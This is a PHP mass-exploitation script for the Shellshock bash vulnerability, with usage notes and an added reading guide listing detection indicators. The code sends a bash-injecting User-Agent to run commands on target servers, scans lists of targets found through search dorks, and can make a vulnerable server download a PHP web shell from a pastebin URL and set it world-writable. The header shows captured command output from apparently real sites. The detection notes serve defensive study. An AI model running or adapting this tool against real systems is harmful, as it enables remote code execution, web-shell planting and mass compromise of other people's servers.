<?php
/*
  # SCRIPT by: [ I N U R L - B R A S I L ] - [ By GoogleINURL ]
  # EXPLOIT NAME: Xpl SHELLSHOCK Ch3ck Tool - (MASS)/ INURL BRASIL
  # AUTHOR: Cleiton Pinheiro / Nick: googleINURL
  # Email: inurlbr@gmail.com
  # Blog: http://blog.inurl.com.br
  # Twitter: https://twitter.com/googleinurl
  # Fanpage: https://fb.com/InurlBrasil
  # Pastebin http://pastebin.com/u/Googleinurl
  # GIT: https://github.com/googleinurl
  # PSS: http://packetstormsecurity.com/user/googleinurl
  # YOUTUBE: http://youtube.com/c/INURLBrasil
  # PLUS: http://google.com/+INURLBrasil
  --------------------------------------------------------------------------------------
  # DESCRIPTION - VULNERABILITY(SHELLSHOCK)
  - CVE-2014-6271, CVE-2014-6277,
  - CVE-2014-6278, CVE-2014-7169,
  - CVE-2014-7186, CVE-2014-7187
  Is a vulnerability in GNU's bash shell that gives attackers access to run
  remote commands on a vulnerable system.
  --------------------------------------------------------------------------------------
  # DESCRIPTION - TOOL
  The tool injects a malicious User-Agent that exploits the Shellshock
  vulnerability to run server-side commands.
  --------------------------------------------------------------------------------------
  # EXECUTION
  -t : SET TARGET.
  -f : SET FILE TARGETS.
  -c : SET COMMAND.
  -w : SET UPLOAD SHELL PHP.
  Execute:
       php xplSHELLSHOCK.php -t target -c command
       php xplSHELLSHOCK.php -f targets.txt -c command
  SHELL UPLOAD:
       php xplSHELLSHOCK.php -t target -c command -w
  OUTPUT VULN: SHELLSHOCK_vull.txt
  --------------------------------------------------------------------------------------
  # EXPLOIT MASS USE SCANNER INURLBR
  ./inurlbr.php --dork 'inurl:"/cgi-bin/login.sh"' -s out.txt -q 1,6 --command-vul "php xpl.php -t '_TARGETFULL_' -c pwd"
  --------------------------------------------------------------------------------------
  # Examples:
  php xpl.php -t 'http://www.camnpalxxx.com.br/cgi-bin/login.sh' -c pwd
  CMD:
  Linux serv 2.6.29.6-smp #2 SMP Mon Aug 17 00:52:54 CDT 2009 i686 Intel(R) Xeon(R) CPU E5504 @ 2.00GHz GenuineIntel GNU/Linux
  uid=1000(icone) gid=100(users) groups=100(users)
  /ico/camnpal/cgi-bin
  END_CMD:
  php xpl.php -t 'http://www.bnmxxx.me.gov.ar/cgi-bin/wxis.exe/opac/?IsisScript=opac/opac.xis' -c pwd
  CMD:
  Linux sitiobnm 2.6.37BNM #26 SMP Tue Jan 25 19:22:26 ART 2011 x86_64 GNU/Linux
  uid=1005(webmaster) gid=1003(webmaster) groups=1003(webmaster)
  /mnt/volume1/sitio/data/catalogos/cgi-bin
  END_CMD:
  --------------------------------------------------------------------------------------
 */

/*
 * Reading guide (what the code below does, and what it leaves behind).
 *
 * Flow: parse the CLI options, build two User-Agent strings that begin with the
 * bash function-definition prefix "() { foo;};", send one HTTP request per
 * target with that User-Agent, and treat a target as vulnerable when the first
 * line of the response body is 99887766555 (the result of the
 * `expr 299663299665 / 3` placed in the header). Hits are appended to
 * SHELLSHOCK_vull.txt. When -w is given, a second request carries a command
 * that downloads a file from a pastebin raw URL, saves it as inurl.php and
 * sets mode 777; the header above describes that file as a PHP shell.
 *
 * Indicators visible in this code, for log review and detection rules:
 *   - a request User-Agent that starts with "() {" and contains "/bin/bash -c";
 *   - response bodies that contain "99887766555", "CMD:" and "END_CMD:";
 *   - a wget from the web-server process to pastebin.com/raw.php, and a file
 *     named inurl.php with mode 777 in that process's working directory;
 *   - follow-up GET requests for ".../inurl.php?0=uname%20-a...".
 * Mitigation: the CVEs listed in the header are closed by patched bash
 * builds; rejecting request headers that begin with "() {" is a common
 * compensating control until the patch is in place.
 *
 * The function declarations sit after their first use; PHP resolves
 * unconditional top-level functions before executing the file, so the calls
 * in the option-handling section work as written.
 */

// Runtime setup: no time limit, errors shown, output flushed as it is produced.
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

// CLI options: -f, -c and -t require a value, -w takes an optional one, --help is a long option.
$op_ = getopt('f:c:t:w::', array('help::'));
echo "\n\t[-] [Exploit]: Xpl SHELLSHOCK Ch3ck / INURL - BRASIL\n\t[?] [help]: --help\n\n";
$menu = " -t : SET TARGET. -f : SET FILE TARGETS. -c : SET COMMAND. -w : SET UPLOAD SHELL PHP. Execute: php xplSHELLSHOCK.php -t target -c command php xplSHELLSHOCK.php -f targets.txt -c command SHELL UPLOAD: php xplSHELLSHOCK.php -t target -c command -w\n";
echo isset($op_['help']) ? $menu : NULL;

// -c is mandatory; the operator's command is appended to "uname -a && id".
// The value of -c is interpolated as-is into the string that is later sent in the header.
$cmd = not_isnull_empty($op_['c']) ?
        "uname -a && id && {$op_['c']}" : exit("\n\t[x] [ERRO] DEFINE COMMAND!\n");

// Command used by the -w path: download from a fixed pastebin raw URL to inurl.php, then chmod 777.
$wget = "wget http://pastebin.com/raw.php?i=UD9UwaNd -O inurl.php; chmod 777 inurl.php";
$params['host'] = not_isnull_empty($op_['t']) ? $op_['t'] : NULL;

// Two header values with the same wrapper: the marker arithmetic, then "CMD:",
// the command, then "END_CMD:". 'user_agent_xpl' carries $cmd, 'payload' carries $wget.
$params['user_agent_xpl'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;{$cmd}; echo END_CMD:;\"";
$params['payload'] = "() { foo;};echo; /bin/bash -c \"expr 299663299665 / 3; echo CMD:;{$wget}; echo END_CMD:;\"";
$params['file'] = not_isnull_empty($op_['f']) ? $op_['f'] : NULL;
$params['line'] = "--------------------------------------------------------------";

// -t and -f are mutually exclusive.
not_isnull_empty($params['host']) && not_isnull_empty($params['file']) ? exit("\n\t[X] [ERRO] DEFINE TARGET OR FILE TARGET\n") : NULL;
// File mode: process every listed target, then exit; the single-target code at the end is not reached.
not_isnull_empty($params['file']) ? __listTarget($params) . exit() : NULL;
echo "\t[+] [COMMAND]: {$cmd}\n";

// Flushes PHP's output buffer and the system write buffer so progress appears immediately.
function __plus() {
    ob_flush();
    flush();
}

// Returns TRUE when $valor is neither null nor empty().
// empty() is also true for "0", 0 and "", so an option value of "0" counts as missing.
function not_isnull_empty($valor = NULL) {
    RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}

// Sends one request to $params['host'] with $params['user_agent_xpl'] as the User-Agent.
//   $op != 0 : returns array(0 => response body split on "\n", 1 => curl_getinfo() array).
//   $op == 0 : returns TRUE and logs the output when the marker line is present, else FALSE.
function __request($params, $op = 0) {
    $objcurl = curl_init($params['host']);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    // TLS host and peer verification are both switched off.
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
    // 5 second connect timeout and 5 second overall timeout per target.
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($objcurl, CURLOPT_TIMEOUT, 5);
    curl_setopt($objcurl, CURLOPT_FRESH_CONNECT, 1);
    curl_setopt($objcurl, CURLOPT_USERAGENT, $params['user_agent_xpl']);
    // The "." concatenation is only there to call __plus() for its flushing side effect.
    $info['corpo'] = curl_exec($objcurl) . __plus();
    $erro = curl_error($objcurl);
    not_isnull_empty($erro) ? print("\t[x] [ERROR]: {$erro}\n") : NULL;
    $_[0] = explode("\n", $info['corpo']);
    $_[1] = curl_getinfo($objcurl);
    if ($op != 0) {
        return $_;
    }
    // Vulnerability test: the first body line equals the expected result of the expr in the header.
    if ($_[0][0] == '99887766555') {
        // Collect body lines up to and including the END_CMD: terminator.
        foreach ($_[0] as $valores) {
            $__.= $valores . "\n";
            if ($valores == 'END_CMD:')
                break;
        }
        $__ = str_replace('99887766555', '', $__);
        // Appends host, captured output and a separator line to the results file in the current directory.
        file_put_contents('SHELLSHOCK_vull.txt', "{$params['host']}{$__}{$params['line']}\n", FILE_APPEND);
        // The literal below contains a raw line break, as in the original source.
        echo "\t[!] VULN SHELLSHOCK\n\t[!] 
OUTPUT SERVER:: {$__}";
        return TRUE;
    } else {
        echo "\t[x] [NOT VULN]\n";
    }
    curl_close($objcurl) . __plus();
    return FALSE;
}

// Reads $file['file'], splits it on "\n", drops empty and duplicate lines,
// and calls __request() once per remaining line with that line as the host.
function __listTarget($file) {
    $tgt_ = array_unique(array_filter(explode("\n", file_get_contents($file['file']))));
    echo "\n\t[!] [INFO] TOTAL SITES LOADED : " . count($tgt_) . "\n\n";
    foreach ($tgt_ as $url) {
        echo "\n\t[+] [INFO] SCANNING : {$url} \n";
        __plus();
        $file['host'] = $url;
        __request($file) . __plus();
    }
}

// Single-target mode: the block runs only when the first request reported the marker.
if (__request($params)) {
    // From here on the User-Agent carries the wget/chmod command instead of $cmd.
    $params['user_agent_xpl'] = $params['payload'];
    $h_ = parse_url($params['host']);
    // URL requested afterwards: parsed host and path of the target, "/inurl.php", and a fixed query string.
    $h__ = "http://{$h_['host']}{$h_['path']}/inurl.php?0=uname%20-a%20%26%26%20ls%20-la";
    if (isset($op_['w'])) {
        echo "\t[!] UPLOAD SHELL_SCRIPT!\n";
        $__ = __request($params, 1);
        if ($__[0][0] == '99887766555') {
            echo "\t[!] PAYLOAD: {$wget}\n";
            echo "\t[!] INCTION PAYLOAD SUCCESS\n";
            $params['host'] = $h__;
            $cmd = __request($params, 1);
            // Compares $cmd['http_code'] with 200 to decide which message to print.
            if ($cmd['http_code'] == 200) {
                echo "\t[!] SUCCESSFULLY UPLOADED FILE {$h__}\n";
                echo "\t[!] opening auxiliary window...\n";
                // NOTE(review): this runs `sudo xterm` on the local machine and places the
                // target-derived URL inside a shell command line; anyone examining the script
                // in a lab should be aware that it executes a privileged local command.
                system("sudo xterm -geometry 134x50 -e curl -v '$h__' > /dev/null &", $dados);
            } else {
                echo "\t[X] FAILURE TO FILE CREATION\n";
            }
        }
    }
    echo "\t" . $params['line'] . "\n";
}
12 Mayıs 2015 Salı